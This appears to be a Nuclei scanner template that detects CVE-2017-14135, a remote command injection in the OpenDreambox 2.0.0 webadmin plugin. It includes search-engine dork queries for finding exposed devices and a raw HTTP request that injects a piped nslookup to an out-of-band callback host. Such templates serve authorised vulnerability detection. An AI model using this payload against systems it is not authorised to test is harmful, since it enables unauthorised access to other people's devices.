60 lines
2.1 KiB
YAML
60 lines
2.1 KiB
YAML
id: CVE-2017-14135
|
|
|
|
info:
|
|
name: OpenDreambox 2.0.0 - Remote Code Execution
|
|
author: alph4byt3
|
|
severity: critical
|
|
description: OpenDreambox 2.0.0 is susceptible to remote code execution via the webadmin plugin. Remote attackers can execute arbitrary OS commands via shell metacharacters in the command parameter to the /script URI in enigma2-plugins/blob/master/webadmin/src/WebChilds/Script.py.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
|
|
remediation: |
|
|
Apply the latest security patches or upgrade to a patched version of OpenDreambox.
|
|
reference:
|
|
- https://the-infosec.com/2017/05/12/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
|
|
- https://www.exploit-db.com/exploits/42293
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2017-14135
|
|
- https://the-infosec.com/2017/07/05/from-shodan-to-rce-opendreambox-2-0-0-code-execution/
|
|
- https://github.com/qazbnm456/awesome-cve-poc
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2017-14135
|
|
cwe-id: CWE-78
|
|
epss-score: 0.96679
|
|
epss-percentile: 0.99643
|
|
cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: dreambox
|
|
product: opendreambox
|
|
shodan-query:
|
|
- title:"Dreambox WebControl"
|
|
- http.title:"dreambox webcontrol"
|
|
fofa-query: title="dreambox webcontrol"
|
|
google-query: intitle:"dreambox webcontrol"
|
|
tags: cve,cve2017,dreambox,rce,oast,edb
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "/bin/sh"
|
|
- "/usr/script"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "dns"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100ce29e5525407a2f2e753300fa20de455c7e569e604d0d846e4829e9d89c40ed3022072c1d24e0789446dff4fdd51e0751550c2c54a31f63af7e901ef7affc7f77b65:922c64590222798bb761d5b6d8e72950 |